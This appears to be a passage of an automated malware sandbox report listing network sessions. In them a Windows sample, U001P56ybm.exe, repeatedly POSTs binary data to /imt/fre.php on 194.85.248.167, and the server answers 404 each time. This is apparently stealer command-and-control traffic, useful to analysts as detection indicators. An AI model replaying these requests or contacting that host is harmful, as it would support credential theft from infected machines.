                  Nov 25, 2021 18:22:51.071537018 CET  1125                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:51.163779974 CET  1125                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:51 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  17          192.168.2.3  49763        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:22:52.226443052 CET  1126                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:52.969003916 CET  1127                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:52 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  18          192.168.2.3  49765        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:22:54.348325014 CET  1138                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:54.655709982 CET  1139                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:54 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  19          192.168.2.3  49766        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:22:55.798213005 CET  1140                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:56.114464998 CET  1141                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:55 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  2           192.168.2.3  49746        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:22:21.772417068 CET  1083                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:21.949353933 CET  1084                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:21 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  20          192.168.2.3  49769        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:22:58.836458921 CET  1156                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:59.163003922 CET  1156                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:58 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  21          192.168.2.3  49770        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:01.423938036 CET  1268                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:02.684122086 CET  1404                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:01 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  22          192.168.2.3  49785        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:07.452291965 CET  1965                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:07.544955015 CET  1967                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:07 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  23          192.168.2.3  49809        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:09.396769047 CET  7360                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:09.919205904 CET  7365                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:09 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  24          192.168.2.3  49813        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:13.834389925 CET  7369                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:13.931421995 CET  7370                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:13 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  25          192.168.2.3  49814        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:19.463238955 CET  7370                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:20.086960077 CET  7371                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:19 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  26          192.168.2.3  49817        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:23.655364990 CET  7987                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:24.492059946 CET  7988                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:23 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  27          192.168.2.3  49818        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:26.318058014 CET  7988                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:26.435048103 CET  7989                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:26 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  28          192.168.2.3  49819        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:27.828007936 CET  7990                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:27.923948050 CET  7991                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:27 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  29          192.168.2.3  49820        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:29.237001896 CET  7991                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:29.329432964 CET  7992                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:29 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  3           192.168.2.3  49747        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:22:23.379975080 CET  1084                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:23.474404097 CET  1085                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:23 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  30          192.168.2.3  49821        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:30.587831020 CET  7992                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:30.896799088 CET  7993                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:30 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  31          192.168.2.3  49822        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:32.864603043 CET  7994                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:32.960192919 CET  7994                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:32 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  32          192.168.2.3  49823        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:35.140691042 CET  7995                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:35.375535965 CET  7996                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:35 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  33          192.168.2.3  49825        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:36.493113041 CET  8002                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:37.014189005 CET  8003                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:36 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  34          192.168.2.3  49827        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:40.295825958 CET  8012                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:40.387691975 CET  8012                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:40 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  35          192.168.2.3  49829        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:41.914761066 CET  8020                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:42.233618021 CET  8020                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:41 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  36          192.168.2.3  49833        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:23:44.612993956 CET  8044                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:44.707284927 CET | 8045 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:44 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  37 | 192.168.2.3 | 49845 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:45.744734049 CET | 8057 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:45.839463949 CET | 8059 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:45 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  38 | 192.168.2.3 | 49851 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:46.879978895 CET | 8072 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:47.403832912 CET | 8077 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:46 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  39 | 192.168.2.3 | 49855 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:48.864530087 CET | 8081 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:48.959682941 CET | 8081 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:48 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  4 | 192.168.2.3 | 49748 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:25.292669058 CET | 1086 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:25.843662024 CET | 1086 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:25 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  40 | 192.168.2.3 | 49856 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:51.197910070 CET | 8082 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:53.573219061 CET | 8083 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:51 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  41 | 192.168.2.3 | 49857 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:55.025971889 CET | 8083 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
